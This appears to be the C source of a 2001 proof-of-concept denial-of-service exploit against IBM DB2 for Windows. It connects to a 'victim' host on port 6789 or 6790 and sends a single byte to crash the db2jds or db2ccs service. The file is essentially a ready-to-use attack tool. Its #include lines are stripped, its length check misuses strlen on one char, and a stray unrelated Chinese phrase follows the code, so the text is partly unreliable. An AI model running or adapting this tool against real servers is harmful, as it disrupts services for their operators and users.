/* ----[ honoriak@helisec 21.7.2001 Denial of Service against IBM DB2 for Windows (98/NT/2000) Problem: Crash when it is sent 1 byte to port 6789 (db2jds.exe) or 6790 (db2ccs.exe) Advisory: Thanks to Gilles. http://packetstormsecurity.org/0107-exploits/ibm.db2.dos.txt Proof of concept. DON'T ABUSE. Script-kiddies: bad luck, it's faked. Man netcat, this .c is useless. Only boredom. */ #include #include #include #include #include #include #include #define PORT 6789 /* or 6790 */ void usage(char *ar) { fprintf(stderr, "DoS against IBM DB2 for Windows (98/NT/2000) by "); fprintf(stderr, "honoriak@helisec\n"); fprintf(stderr, "usage: %s victim\n", ar); exit(0); } unsigned long resolv(char *h) { struct in_addr h_prov; struct hostent *hv; if (!(hv = gethostbyname(h))) return(0); memcpy((char *)&h_prov.s_addr, hv->h_addr, hv->h_length); return(h_prov.s_addr); } int main(int argc, char *argv[]) { struct sockaddr_in vic; unsigned char boom; int sck, cn; boom = 'P'; if (argc < 2) { usage(argv[0]); } bzero(&vic, sizeof(vic)); vic.sin_family = AF_INET; vic.sin_port = htons(PORT); if ( (inet_pton(AF_INET, argv[1], &vic.sin_addr)) <= 0) { vic.sin_addr.s_addr = resolv(argv[1]); } if (!vic.sin_addr.s_addr) { fprintf(stderr, "Error resolving host\n"); exit(-1); } if ( (sck = socket(AF_INET, SOCK_STREAM, 0)) < 0) { fprintf(stderr, "Error opening socket\n"); exit(-1); } if ( (cn = connect(sck, (struct sockaddr *)&vic, sizeof(vic))) < 0) { fprintf(stderr, "Error connecting...\n"); exit(-1); } if ( (send(sck, &boom, strlen(&boom), 0)) < 1) { fprintf(stderr, "Error sending, IBM DB2 is installed? 6789 is closed. Try 6790.\n"); exit(-1); } fprintf(stderr, "1 byte sent"); exit(-1); } /* helisec 2001 */

亚洲欧美在线